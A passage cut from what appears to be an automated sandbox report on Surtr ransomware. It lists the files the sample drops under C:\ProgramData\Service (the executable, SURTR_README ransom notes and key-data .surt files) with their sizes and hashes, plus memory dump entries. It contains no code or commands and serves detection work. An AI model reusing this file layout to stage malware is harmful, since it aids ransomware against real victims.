                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      PID:3136

                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\ID_DATA.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      14B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      80bde8bfdca71df6e4938821fd6c2bdc

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      96ce3324272c5e830b36c7ee216a4ee488f96856

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      821b811f1dbcdcd22bad20fd56f0aaea6e731f22ebf797629383369aac93aca7

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      4ddb1d3dc84cdfe02c0d95d305a71048093e8603e732d90f7d5af12594417bf4cc35f7fa0216e50b1dc8efb3e5a69fcb2fe53b8685894910ccc1c3b593b8759a

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\PrivateData_t0pq1466jbkptx.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      85ad3c9e26309830fededb2c22c300b8

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      f4e0c0e5a8d0366fc38a555e301b81f3522c9360

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      0cfb267217e5b1fe6e02ca4d144d4078e843c536a592956fca17ab9e6de022e9

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      79e0c7ffd54b5764b3c9062ce5bf96854bd2cc6c35473d02e5e52df4ea1ee375777c876fbdb332ecf160a319366ea9039ba44e33dc2c2d54f1b1de48e101ca5c

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\PublicData_t0pq1466jbkptx.surt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      204B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      9ee120833287ec81446322f6bb63a19b

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      fa57895c6f557866f8cdc528b11adf9c1ef7ae61

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      b9f7ae6f7fd20801e7ac2ee9ca5308eda2e61b577f2b02926fb9a31c1879dc31

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      26d0a9cabb3006fd5a1a1f8b7cf621ba5d0b0989e845ae41ef9c4d24903cc635022f25421d7bd440ccf9ec9e4f6914deb5471a4903b97f6172e420616a425bd6

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\SURTR_README.hta

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      c24163a441f92590350d7aaec04d3da4

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      cf98942faccbec0e97eacca6125e8d5d16e83828

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      4a5328fc0c1b6b4d9abfc0c4d9667c1cc4559f63de3461788146e54aaf336ab4

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      c8c5e385ff056e051aa4c1a544d39d21cf7da6736090ffeccad21eae0751f7001d773688628b6a44bf33f1304479dcfb0ffea523a6b62de35f90520f3452360e

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\SURTR_README.txt

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      618B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      f1b8d3877104b647610177a24b8a0593

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      cdeb37ecccb5a58c082071f6b892c582d224372f

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      33b67b2af195eea2c5a4e62bb8a579a3de8afc576d71e7121e331c1768c0e477

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      5b6f8054d70e2364d31c10cb7f4455be2744e7da0bc45f40f46321e1e29bd1e583627cec37385f7b90aa91c84d4b4e23e07c083ca6111f9af2fa6d029d0e1d66

                                                                                                                                                                                                                                                                    • C:\ProgramData\Service\Surtr.exe

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      190KB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      5409ee640663b8d1f520af46c1146c0e

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      73eebd0dd94ce3d161a7f191196b8bcc354af55a

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      dbaf6fdb7ae2dcbbce17aa9c1fc1932a054a024c9f32db8f8c810c9023480476a508397ae9a5e231ba27ce85c6d402b0ce5beb63a4b7fcb20702af9d1ec7f82a

                                                                                                                                                                                                                                                                    • memory/1796-132-0x0000000000400000-0x000000000050B000-memory.dmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                    • memory/1796-154-0x0000000000400000-0x000000000050B000-memory.dmp

                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.0MB